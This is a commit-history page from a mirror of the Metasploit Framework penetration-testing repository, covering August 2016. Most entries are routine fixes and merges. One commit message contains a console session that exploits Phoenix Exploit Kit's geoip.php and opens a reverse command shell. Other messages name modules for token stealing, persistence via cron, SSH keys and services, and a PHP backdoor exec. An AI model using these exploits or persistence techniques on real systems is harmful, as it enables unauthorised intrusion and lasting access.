infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
39,396 Commits
7 Branches
556 Tags
419 MiB
Commit Graph

39396 Commits (26491eed1acb2a4e38af39979694faa00707aa0a)

Author SHA1 Message Date
William Webb 3b3b4723c2
Land #7231, Fix Android Meterpreter command autoload and sysinfo 2016-08-22 12:22:43 -05:00
wchen-r7 0832833350
Land #7222, Add KB for multi/http/caidao_php_backdoor_exec 2016-08-22 11:51:02 -05:00
wchen-r7 0b73786e10 avoid bad filter 2016-08-22 11:47:39 -05:00
Jay Turla 1065b4cfe2 Linked the zip file 2016-08-23 00:33:04 +08:00
William Webb f2eb4b88a1
Land #7220, Add Phoenix Exploit Kit RCE 2016-08-22 11:16:30 -05:00
William Webb 455ba42f5b
Land #7218, Add new post-exploitation APIs for stealing access tokens 2016-08-22 10:55:42 -05:00
David Maloney 20947cd6cd
remove old dependency on net-ssh moneykpatch 
the ssh_login_pubkey scanner relied on functionality that
was monkeypatched into our vendored copy. this was an uneeded solution
in the first palce, and we now use a more sane method of accomplishing
the same thing
 2016-08-22 10:54:09 -05:00
David Maloney b6dff719f3
add a hard require to the ssh mixin 
added hard require for SSHFactory into the ssh exploit mixin
this should prevent any laod-order bugs from cropping up again
 2016-08-22 09:56:07 -05:00
Tim Wright 3955c4332d fix android autoload commands and sysinfo 2016-08-22 14:53:58 +01:00
Brandon Perry 2abf71a3ac Create zabbix_toggleids_sqli 2016-08-21 12:43:20 -05:00
Jay Turla 139d431230 eliminate space 2016-08-20 04:17:22 +08:00
dmohanty-r7 0c618cccef Use openvas-omp gem for crud operations 
MS-1718
 2016-08-19 15:14:32 -05:00
dmohanty-r7 4478136065 Unvendor openvas-omp gem 
MS-1718
 2016-08-19 15:14:32 -05:00
Jay Turla 51a2354fea Add KB for multi/http/caidao_php_backdoor_exec 2016-08-20 04:12:31 +08:00
Metasploit 87d34cfbba
Bump version of framework to 4.12.22 2016-08-19 10:02:28 -07:00
Jay Turla ee89b20ab7 remove 'BadChars' 2016-08-19 23:49:11 +08:00
wchen-r7 265adebd50 Fix typo 2016-08-19 10:44:24 -05:00
Jay Turla e3d1f8e97b Updated the description 2016-08-19 22:22:56 +08:00
Jay Turla 5a4f0cf72f run msftidy 2016-08-19 21:56:02 +08:00
Jay Turla c66ea5ff8f Correcting the date based on the EDB 2016-08-19 21:47:57 +08:00
Jay Turla d4c82868de Add Phoenix Exploit Kit Remote Code Execution 
This module exploits a Remote Code Execution in the web panel of Phoenix Exploit Kit Remote Code Execution via the geoip.php. The Phoenix Exploit Kit is a popular commercial crimeware tool that probes the browser of the visitor for the presence of outdated and insecure versions of browser plugins like Java, and Adobe Flash and Reader which then silently installs malware.

```
msf exploit(phoenix_exec) > show options

Module options (exploit/multi/http/phoenix_exec):

   Name       Current Setting              Required  Description
   ----       ---------------              --------  -----------
   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.52.128               yes       The target address
   RPORT      80                           yes       The target port
   SSL        false                        no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /Phoenix/includes/geoip.php  yes       The path of geoip.php which is vulnerable to RCE
   VHOST                                   no        HTTP server virtual host


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.52.129   yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Phoenix Exploit Kit / Unix


msf exploit(phoenix_exec) > check
[+] 192.168.52.128:80 The target is vulnerable.
msf exploit(phoenix_exec) > exploit

[*] Started reverse TCP double handler on 192.168.52.129:4444 
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RZpbBEP77nS8Dvm4;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "RZpbBEP77nS8Dvm4\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 5 opened (192.168.52.129:4444 -> 192.168.52.128:51748) at 2016-08-19 09:29:22 -0400

uname -a
Linux ubuntu 4.4.0-28-generic #47-Ubuntu SMP Fri Jun 24 10:08:35 UTC 2016 i686 i686 i686 GNU/Linux
```
 2016-08-19 21:29:55 +08:00
Rob Fuller 42462f03e2
Land #7219, ps -c listing of child processes 
Awesome work by @wvu-r7 to help with identifying processes
started by the meterpreter session.
 2016-08-19 00:27:06 -04:00
William Vu 3d4d7aae14 Add ps -c to show child processes of current shell 2016-08-18 19:23:21 -05:00
wchen-r7 0f4d26af19 Update yard doc 2016-08-18 17:18:16 -05:00
wchen-r7 2a61450511 Add new POST exploitation APIs for stealing a token 2016-08-18 17:08:21 -05:00
wchen-r7 b081dbf703 Make destination required 2016-08-18 15:56:16 -05:00
William Webb 3eb3c5afa2
Land #7215, Fix drupal_coder_exec bugs #7215 2016-08-18 13:43:23 -05:00
James Lee 91417e62a8
Cleanup docs 2016-08-18 10:40:32 -05:00
William Vu bc9a402d9e
Land #7214, print_brute ip:rport fix 2016-08-17 22:48:40 -05:00
William Vu 2b6576b038
Land #7012, Linux service persistence module 2016-08-17 22:45:35 -05:00
William Vu c64d91457f
Land #7003, cron/crontab persistence module 2016-08-17 22:45:16 -05:00
William Vu 2fa4c7073b
Land #6995, SSH key persistence module 2016-08-17 22:44:57 -05:00
wchen-r7 e154aafaaa On Error Resume Next for zip.vbs 2016-08-17 17:08:38 -05:00
wchen-r7 60937ec5e9 If user is SYSTEM, then steal a token before decompression 2016-08-17 16:56:09 -05:00
William Webb 667c3566e5
Land #7209, Add functionality to pull .NET versions on Windows hosts 2016-08-17 12:48:05 -05:00
William Vu 4228868c29 Clean up after yourself 
Can't use FileDropper. :(
 2016-08-16 23:09:14 -05:00
William Vu 1f63f8f45b Don't override payload 
pl is a cheap replacement.
 2016-08-16 23:08:53 -05:00
William Vu b3402a45f7 Add generic payloads 
Useful for testing and custom stuff.
 2016-08-16 23:08:09 -05:00
Brent Cook b37dc8ea27
Land #7210, allow send_request_cgi to close a non-global socket 2016-08-16 22:54:23 -05:00
Brendan b25b2a5188 Cleaned up code per suggestions in the PR 2016-08-16 16:16:25 -05:00
wchen-r7 5f8ef6682a Fix #7202, Make print_brute print ip:rport if available 
Fix #7202
 2016-08-16 15:34:30 -05:00
Brendan bf77e14bef
Land #7212, Revert back win32/win64 platform string for Windows meterpreter 2016-08-16 11:26:13 -05:00
David Maloney 42b1ced4fb
remove *scan from gemspec bins 
update the gemspec so that it doesn't try to build binstubs
for the *scan bins

MS-1691
 2016-08-16 09:33:09 -05:00
Brent Cook 870669bdf7 handle exception in getsystem module 2016-08-15 23:51:05 -05:00
Brent Cook e70402a130 use the platform string verbatim on windows meterpreter 2016-08-15 23:50:57 -05:00
wchen-r7 498657ab35 Fix #3860, tearing down TCP connection for send_request_cgi 
Fix #3860
 2016-08-15 15:45:52 -05:00
Brendan 0778b77f7b Cleaned up a little 2016-08-15 12:20:28 -07:00
David Maloney 8bece28d00
remove *scan bins as well 
all *scan bins need to be removed as the rex-bin_tools
gem will now handle these and put them in PATH

MS-1691
 2016-08-15 14:04:00 -05:00
David Maloney d2a6c2e9ca
move rex bintools into new gem 
move all the *scan *parsey code out into
the new rex-bin_tools gem

MS-1691
 2016-08-15 14:01:43 -05:00
Brendan 7730e0eb27 Added ability to retrieve .NET versions 2016-08-15 11:29:00 -07:00